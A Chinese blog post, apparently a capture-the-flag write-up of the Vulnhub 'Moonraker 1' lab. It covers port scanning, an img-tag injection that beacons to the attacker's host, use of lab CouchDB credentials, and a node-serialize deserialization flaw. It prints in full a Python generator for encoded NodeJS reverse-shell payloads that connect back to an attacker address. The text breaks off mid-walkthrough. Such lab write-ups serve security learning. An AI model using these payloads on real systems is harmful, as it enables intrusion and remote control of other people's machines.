<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="baidu-site-verification" content="0VfsPuBgSE">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"warm-glow.fun","root":"/","scheme":"Mist","version":"7.7.2","exturl":true,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":false},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":true,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="- 靶机信息： 说明：您已经收到有关新反派大量投资于太空和激光技术的情报。尽管反派是谁未知，但我们知道动机不祥且世界末日。入侵Moonraker系统，一劳永逸地发现谁在这些诱人的计划背后。在为时已晚之前找到并摧毁小人！ 难度：挑战级 flag：&#x2F;root&#x2F;flag.txt 启用DHCP 默认情况下，除了kali上的工具外，没有其他工具 学习目标：客户端攻击，NoSQL，RESTful，NodeJS">
<meta property="og:type" content="article">
<meta property="og:title" content="Moonraker 1靶机渗透">
<meta property="og:url" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="漫漫人生路">
<meta property="og:description" content="- 靶机信息： 说明：您已经收到有关新反派大量投资于太空和激光技术的情报。尽管反派是谁未知，但我们知道动机不祥且世界末日。入侵Moonraker系统，一劳永逸地发现谁在这些诱人的计划背后。在为时已晚之前找到并摧毁小人！ 难度：挑战级 flag：&#x2F;root&#x2F;flag.txt 启用DHCP 默认情况下，除了kali上的工具外，没有其他工具 学习目标：客户端攻击，NoSQL，RESTful，NodeJS">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/1.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/2.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/3.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/4.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/5.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/6.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/7.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/8.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/9.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/10.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/11.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/12.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/14.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/13.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/15.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/16.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/17.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/18.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/19.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/20.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/21.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/22.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/23.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/24.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/25.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/26.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/27.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/28.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/29.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/30.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/31.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/32.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/33.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/34.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/35.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/36.png">
<meta property="og:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/37.png">
<meta property="article:published_time" content="2020-03-13T12:21:35.000Z">
<meta property="article:modified_time" content="2020-03-13T12:30:35.043Z">
<meta property="article:author" content="warm glow">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="Moonraker">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/1.png">

<link rel="canonical" href="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>Moonraker 1靶机渗透 | 漫漫人生路</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="漫漫人生路" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">漫漫人生路</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签<span class="badge">21</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档<span class="badge">19</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <span class="exturl github-corner" data-url="aHR0cHM6Ly9naXRodWIuY29tL3dhcm0tZ2xvdw==" title="Follow me on GitHub" aria-label="Follow me on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></span>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/kirito.jpg">
      <meta itemprop="name" content="warm glow">
      <meta itemprop="description" content="如夜空般将世界温柔地覆盖">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="漫漫人生路">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          Moonraker 1靶机渗透
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-03-13 20:21:35 / 修改时间：20:30:35" itemprop="dateCreated datePublished" datetime="2020-03-13T20:21:35+08:00">2020-03-13</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/write-up/" itemprop="url" rel="index"><span itemprop="name">write up</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="靶机信息："><a href="#靶机信息：" class="headerlink" title="- 靶机信息："></a>- 靶机信息：</h2><ul>
<li>说明：您已经收到有关新反派大量投资于太空和激光技术的情报。尽管反派是谁未知，但我们知道动机不祥且世界末日。入侵Moonraker系统，一劳永逸地发现谁在这些诱人的计划背后。在为时已晚之前找到并摧毁小人！</li>
<li>难度：挑战级</li>
<li>flag：/root/flag.txt</li>
<li>启用DHCP</li>
<li>默认情况下，除了kali上的工具外，没有其他工具</li>
<li>学习目标：客户端攻击，NoSQL，RESTful，NodeJS，Linux枚举和Google-fu</li>
</ul>
<a id="more"></a>

<h2 id="渗透流程："><a href="#渗透流程：" class="headerlink" title="- 渗透流程："></a>- 渗透流程：</h2><p>首先要知道目标靶机的IP，使用<code>nmap -sP 192.168.183.1/24</code><br><img src="1.png" alt="1"></p>
<p>知道靶机IP后，接下来要扫描靶机端口，看看靶机开启了什么服务。<code>nmap -sV -p- --open 192.168.183.143</code><br><img src="2.png" alt="2"></p>
<p>开启的端口中22(SSH)、80(http)、3000(nodejs)、5984(couchdb)，这四个端口可能有用，惯例先去80端口的web页面看看。一打开就是一段电影画面，过后出现了三个按钮，都点点看，发现service按钮有新东西。滑到底部，发现给了一个链接，告诉我们如果对服务感兴趣，可以发送一个查询。<br><img src="3.png" alt="3"></p>
<p>点击，打开一个新的页面，提示销售代表会在5分钟内查看我们发送的信息。<br><img src="4.png" alt="4"></p>
<p>既然它会查看，那我们的渗透思路如下：可以发送一个img标签<code>&lt;img src=&quot;192.168.183.138/1.txt&quot;&gt;&lt;/img&gt;</code>，这个标签被插入页面后，当销售代表访问那个记录信息的页面时，这个标签就会加载。然后就会访问<code>192.168.183.138</code>即我的kali攻击机上面的1.txt文件，把它当成一张图片在页面上显示出来(这个文件是不是图片，存不存在都可以，它都会访问)。这样我们就可以从apache的日志中知道销售代表访问我们时所处页面的URL了。</p>
<p>思路确定了，开始操作。要发送的信息如图，在哪个框都无所谓。<br><img src="5.png" alt="5"></p>
<p>然后在kali启动Apache服务，记得启动前，查看下Apache的端口配置文件，确定一下Apache的端口号。<br><img src="6.png" alt="6"></p>
<p>我的端口是默认的80端口，所以标签里面的IP后面不需要接端口号，如果不是80，则要加端口号。然后启动Apache服务，kali的启动方法是<code>/etc/init.d/apache2 start</code>，启动后去kali浏览器访问下localhost，如下图这样就是成功启动了。<br><img src="7.png" alt="7"></p>
<p>然后回到靶机的那个发送请求页面，发送请求，可以看到已经发送成功了<br><img src="8.png" alt="8"></p>
<p>然后我们等一会，去查看apache的日志。<br><img src="9.png" alt="9"></p>
<p>红框里面可以看到销售代表的那个页面的网址了，去访问看看。<br><img src="10.png" alt="10"></p>
<p>发现是空的，我们之前发送的东西已经被删除了，但这不碍事，我们返回它的管理页面。<br><img src="11.png" alt="11"></p>
<p>每个都点进去看看，在第二个发现了一些关于couchdb的信息。<br><img src="12.png" alt="12"></p>
<p>得知了一个路径<code>/_all_dbs</code>，然后知道了jaws这个用户，密码是他的女朋友的名字+”x99”，因为网站一开始就是一段影片，所以我们google一下Moonraker jaws，发现是一部科幻电影里面的角色。然后在wiki里面找到了他女朋友的名字dolly。<br><img src="14.png" alt="14"></p>
<p>现在我们已经拿到了一个账户和密码。但是不要着急，看看还有没有别的关键信息。然后在第四个那里也发现了关键信息。<br><img src="13.png" alt="13"></p>
<p>这里大致的意思是3000端口使用了nodejs的反序列化，并给了详细代码，我们现在还用不到这个信息，先记下来。然后就没有其他关键信息了。我们转战couchdb的5984端口，然后访问一下<code>/_all_dbs</code>这个路径。<br><img src="15.png" alt="15"></p>
<p>这个页面输出了所有库的名字，但是没什么用处，我们现在需要一个登录后台管理的页面。google一下couchdb，查询一下默认的后台页面是什么。<br><img src="16.png" alt="16"></p>
<p>查询到了，是<code>/_utils</code>，访问一下，然后使用账号密码登录。用户名<code>jaws</code>，密码<code>dollyx99</code>。<br><img src="17.png" alt="17"></p>
<p>成功登录后，看看每个数据库里面的信息，在link库里面有新发现。<br><img src="18.png" alt="18"></p>
<p>发现了四条数据，都点开看看。<br><img src="19.png" alt="19"></p>
<p>发现每个都记录有一段URL，记下来，一个个访问。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;cats&#x2F;cats-gallery.html</span><br><span class="line">&#x2F;surv-cam&#x2F;recent.html</span><br><span class="line">&#x2F;HR-Confidential&#x2F;offer-letters.html</span><br><span class="line">&#x2F;x-files&#x2F;deep-space-findings.html</span><br></pre></td></tr></table></figure>

<p>在<code>/HR-Confidential/offer-letters.html</code>这个页面有新的收获。这里有他们的offer信息。<br><img src="20.png" alt="20"></p>
<p>点开发现几乎每一个都记录着他们自己的用户名和密码，都记录下来。<br><img src="21.png" alt="21"></p>
<p>然后在<code>/x-files/deep-space-findings.html</code>页面发现一段话。<br><img src="22.png" alt="22"></p>
<p>提示我们数据放到了一个更安全的地方，想到之前看到的那个提示3000端口有反序列化程序的页面，这应该是要我们去访问3000端口了。访问3000端口，需要用户名和密码，把offer letter里面的密码一个个试，发现hugo可以登录，但是登录后页面只有一句话。<br><img src="23.png" alt="23"></p>
<p>访问给的网址，确实是一段音频，但是没有可以提取的信息，这时候我们使用burp抓包看看。<br><img src="24.png" alt="24"></p>
<p>发现cookie的profile有点眼熟，想到之前看到的那个记载了3000端口使用的代码的信息，研究一下。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//Stuff to import</span></span><br><span class="line">var express = require('express');</span><br><span class="line">var cookieParser = require('cookie-parser');</span><br><span class="line">var escape = require('escape-html');</span><br><span class="line">var serialize = require('node-serialize');</span><br><span class="line">var app = express();</span><br><span class="line"></span><br><span class="line"><span class="comment">// Here's the function they want reviewed...</span></span><br><span class="line"><span class="comment">// I think it decodes the weird cookie string and runs it, prints it, sets it or idk.</span></span><br><span class="line"></span><br><span class="line">app.get('/', function(req, res) &#123;</span><br><span class="line">	 if (req.cookies.profile) &#123;</span><br><span class="line">	    var str = new Buffer(req.cookies.profile, 'base64').toString();</span><br><span class="line">	    var obj = serialize.unserialize(str);</span><br><span class="line">   	    	if (obj.username) &#123;</span><br><span class="line">      		         res.send("Stuff here then print out username.. " + escape(obj.username)");</span><br><span class="line">    	   		          &#125;</span><br><span class="line">	      &#125; else &#123;</span><br><span class="line">   		         res.cookie('profile', "eyJ1c2VybmFtZSI6Imh1Z28ifQ==", &#123;</span><br><span class="line"> 				 maxAge: 900000,</span><br><span class="line">		                 httpOnly: true</span><br><span class="line"> 			            &#125;);</span><br><span class="line">		   &#125;</span><br><span class="line">&#125;);</span><br><span class="line">app.listen(3000);</span><br></pre></td></tr></table></figure>

<p>大致意思就是把cookie中的profile先base64解码，然后执行nodejs的反序列化，再检查里面是否有username的信息，没有则给profile重新赋值，我们抓包看到的值就是重新赋值的。这里的重点是反序列化，所以google一下nodejs反序列化漏洞。</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9vcHNlY3guY29tL2luZGV4LnBocC8yMDE3LzAyLzA4L2V4cGxvaXRpbmctbm9kZS1qcy1kZXNlcmlhbGl6YXRpb24tYnVnLWZvci1yZW1vdGUtY29kZS1leGVjdXRpb24v" title="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/">https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/<i class="fa fa-external-link"></i></span> 这个人讲的比较清楚。我简单介绍一下nodejs反序列化漏洞，就是<code>unserialize()</code>是通过将带有立即调用的函数表达式（IIFE）的序列化JavaScript对象传递给节点序列化模块中的函数，因为没有对输入进行检查所以可以利用这个函数来实现任意代码执行。因为我不懂nodejs，所以我直接借用他的成果了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">!/usr/bin/python</span><br><span class="line"><span class="comment"># Generator for encoded NodeJS reverse shells</span></span><br><span class="line"><span class="comment"># Based on the NodeJS reverse shell by Evilpacket</span></span><br><span class="line"><span class="comment"># https://github.com/evilpacket/node-shells/blob/master/node_revshell.js</span></span><br><span class="line"><span class="comment"># Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)</span></span><br><span class="line"><span class="comment"># Insecurety Research (2013) - insecurety.net</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) != <span class="number">3</span>:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"Usage: %s &lt;LHOST&gt; &lt;LPORT&gt;"</span> % (sys.argv[<span class="number">0</span>])</span><br><span class="line">    sys.exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">IP_ADDR = sys.argv[<span class="number">1</span>]</span><br><span class="line">PORT = sys.argv[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charencode</span><span class="params">(string)</span>:</span></span><br><span class="line">    <span class="string">"""String.CharCode"""</span></span><br><span class="line">    encoded = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> string:</span><br><span class="line">        encoded = encoded + <span class="string">","</span> + str(ord(char))</span><br><span class="line">    <span class="keyword">return</span> encoded[<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"[+] LHOST = %s"</span> % (IP_ADDR)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"[+] LPORT = %s"</span> % (PORT)</span><br><span class="line">NODEJS_REV_SHELL = <span class="string">'''</span></span><br><span class="line"><span class="string">var net = require('net');</span></span><br><span class="line"><span class="string">var spawn = require('child_process').spawn;</span></span><br><span class="line"><span class="string">HOST="%s";</span></span><br><span class="line"><span class="string">PORT="%s";</span></span><br><span class="line"><span class="string">TIMEOUT="5000";</span></span><br><span class="line"><span class="string">if (typeof String.prototype.contains === 'undefined') &#123; String.prototype.contains = function(it) &#123; return this.indexOf(it) != -1; &#125;; &#125;</span></span><br><span class="line"><span class="string">function c(HOST,PORT) &#123;</span></span><br><span class="line"><span class="string">    var client = new net.Socket();</span></span><br><span class="line"><span class="string">    client.connect(PORT, HOST, function() &#123;</span></span><br><span class="line"><span class="string">        var sh = spawn('/bin/sh',[]);</span></span><br><span class="line"><span class="string">        client.write("Connected!\\n");</span></span><br><span class="line"><span class="string">        client.pipe(sh.stdin);</span></span><br><span class="line"><span class="string">        sh.stdout.pipe(client);</span></span><br><span class="line"><span class="string">        sh.stderr.pipe(client);</span></span><br><span class="line"><span class="string">        sh.on('exit',function(code,signal)&#123;</span></span><br><span class="line"><span class="string">          client.end("Disconnected!\\n");</span></span><br><span class="line"><span class="string">        &#125;);</span></span><br><span class="line"><span class="string">    &#125;);</span></span><br><span class="line"><span class="string">    client.on('error', function(e) &#123;</span></span><br><span class="line"><span class="string">        setTimeout(c(HOST,PORT), TIMEOUT);</span></span><br><span class="line"><span class="string">    &#125;);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">c(HOST,PORT);</span></span><br><span class="line"><span class="string">'''</span> % (IP_ADDR, PORT)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"[+] Encoding"</span></span><br><span class="line">PAYLOAD = charencode(NODEJS_REV_SHELL)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"eval(String.fromCharCode(%s))"</span> % (PAYLOAD)</span><br></pre></td></tr></table></figure>

<p>这个Python脚本可以生成反序列化的具有弹shell功能的payload。我们新建一个文件将代码放进去。然后使用Python运行<code>python 1.py 192.168.183.138 1234</code>后面两个参数，第一个参数填kali攻击机的IP，第二个参数填kali接收shell的端口。<br><img src="25.png" alt="25"></p>
<p>因为3000端口的js代码会先将profile字段的值base64解码，然后进行反序列化，所以我们要反着来，确保执行完js代码后，结果是我们生成的这个payload。所以我们要先将生成的payload序列化，要进行这个操作，需要nodejs的node-serialize模块。所以我们要在kali里面安装nodejs。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get install nodejs  &#x2F;&#x2F;安装nodejs</span><br><span class="line">apt-get install npm  &#x2F;&#x2F;安装nodejs的包管理工具</span><br><span class="line">npm install node-serialize  &#x2F;&#x2F;用npm安装node序列化模块</span><br></pre></td></tr></table></figure>

<p>npm是node.js的一个包管理工具，就如同linux中的yum仓库，rpm包管理；如同python中的pip包管理工具一样。这些包管理工具都是予以使用的人们方便，同时解决各种包依赖之间的关系的。</p>
<p>把环境准备好后，我们使用nodejs执行下面的js代码。</p>
